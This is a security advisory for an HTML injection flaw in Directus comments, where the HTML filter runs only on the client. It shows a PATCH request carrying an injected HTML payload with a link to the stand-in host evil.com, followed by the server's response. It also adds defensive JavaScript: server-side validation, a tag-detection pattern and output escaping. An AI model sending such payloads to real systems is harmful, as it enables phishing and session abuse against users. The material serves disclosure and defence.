CVE-2024-54128 – directus
Package
Manager: npm
Name: directus
Vulnerable Version: >=10.10.0 <10.13.4 || >=11.0.0-rc.1 <11.2.2
Severity
Level: Medium
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
EPSS: 0.00076 (percentile 0.23488)
Details
Directus has an HTML Injection in Comment

### Summary

The Comment feature has implemented a filter to prevent users from adding restricted characters, such as HTML tags. However, this filter operates on the client-side, which can be bypassed, making the application vulnerable to HTML Injection.

### Details

The Comment feature implements a character filter on the client-side; this can be bypassed by directly sending a request to the endpoint.

Example Request:

```
PATCH /activity/comment/3 HTTP/2
Host: directus.local

{
  "comment": "<h1>TEST <p style=\"color:red\">HTML INJECTION</p> <a href=\"//evil.com\">Test Link</a></h1>"
}
```

Example Response:

```json
{
  "data": {
    "id": 3,
    "action": "comment",
    "user": "288fdccc-399a-40a1-ac63-811bf62e6a18",
    "timestamp": "2023-09-06T02:23:40.740Z",
    "ip": "10.42.0.1",
    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
    "collection": "directus_files",
    "item": "7247dda1-c386-4e7a-8121-7e9c1a42c15a",
    "comment": "<h1>TEST <p style=\"color:red\">HTML INJECTION</p> <a href=\"//evil.com\">Test Link</a></h1>",
    "origin": "https://directus.local",
    "revisions": []
  }
}
```

Example Result:

## Impact

With the introduction of session cookies this issue has become exploitable, as a malicious script is now able to perform authenticated actions on the current user's behalf.
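The root cause above is a validation rule enforced only in the browser. As an added example (not Directus code), this is the shape of the server-side check the endpoint needs, enforcing the same "no HTML tags" rule on the request body itself, plus output escaping for the render path. All function and constant names are assumptions; `INJECTED_COMMENT` is the request body from the advisory.

```javascript
// Added example, not Directus code: the server-side check a comment endpoint
// needs, enforcing the same "no HTML tags" rule the client filter applied.
// All names are assumptions; INJECTED_COMMENT is the payload from the advisory.

const INJECTED_COMMENT =
  '<h1>TEST <p style="color:red">HTML INJECTION</p> <a href="//evil.com">Test Link</a></h1>';

// Matches any HTML-like tag: opening, closing, or a comment/doctype ("<!").
// A bare "<" in prose such as "1 < 2" is deliberately left alone.
const TAG_PATTERN = /<\/?[a-z!][^>]*>/i;

const MAX_COMMENT_LENGTH = 10_000; // assumed limit; pick one that fits the product

// Validate the JSON body of a comment create/update request on the server.
// Returns { ok: true, comment } with the accepted raw text, or { ok: false, reason }.
// Because this runs server-side, skipping the UI and calling the endpoint
// directly (as in the advisory's example request) no longer bypasses the rule.
function validateCommentPayload(body) {
  if (typeof body !== 'object' || body === null) {
    return { ok: false, reason: 'body must be a JSON object' };
  }
  const { comment } = body;
  if (typeof comment !== 'string') {
    return { ok: false, reason: 'comment must be a string' };
  }
  if (comment.length === 0 || comment.length > MAX_COMMENT_LENGTH) {
    return { ok: false, reason: 'comment length out of range' };
  }
  if (TAG_PATTERN.test(comment)) {
    return { ok: false, reason: 'HTML tags are not allowed in comments' };
  }
  return { ok: true, comment };
}

// Output encoding for the render path: whatever is stored is emitted as text,
// so even a value that slipped past validation cannot become markup.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Demo: the advisory's payload is rejected; an ordinary comment is accepted.
console.log(validateCommentPayload({ comment: INJECTED_COMMENT }));
console.log(validateCommentPayload({ comment: 'Looks fine, 1 < 2 && ready to ship' }));
console.log(escapeHtml(INJECTED_COMMENT));
```

Rejecting at the API layer is what closes the bypass; the escaping is defence in depth so that a stored value never reaches the page as markup.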
Metadata
Created: 2024-12-05T22:37:32Z
Modified: 2024-12-05T22:37:33Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-r6wx-627v-gh2f/GHSA-r6wx-627v-gh2f.json
CWE IDs: ["CWE-80"]
Alternative ID: GHSA-r6wx-627v-gh2f
Finding: F063
Auto approve: 1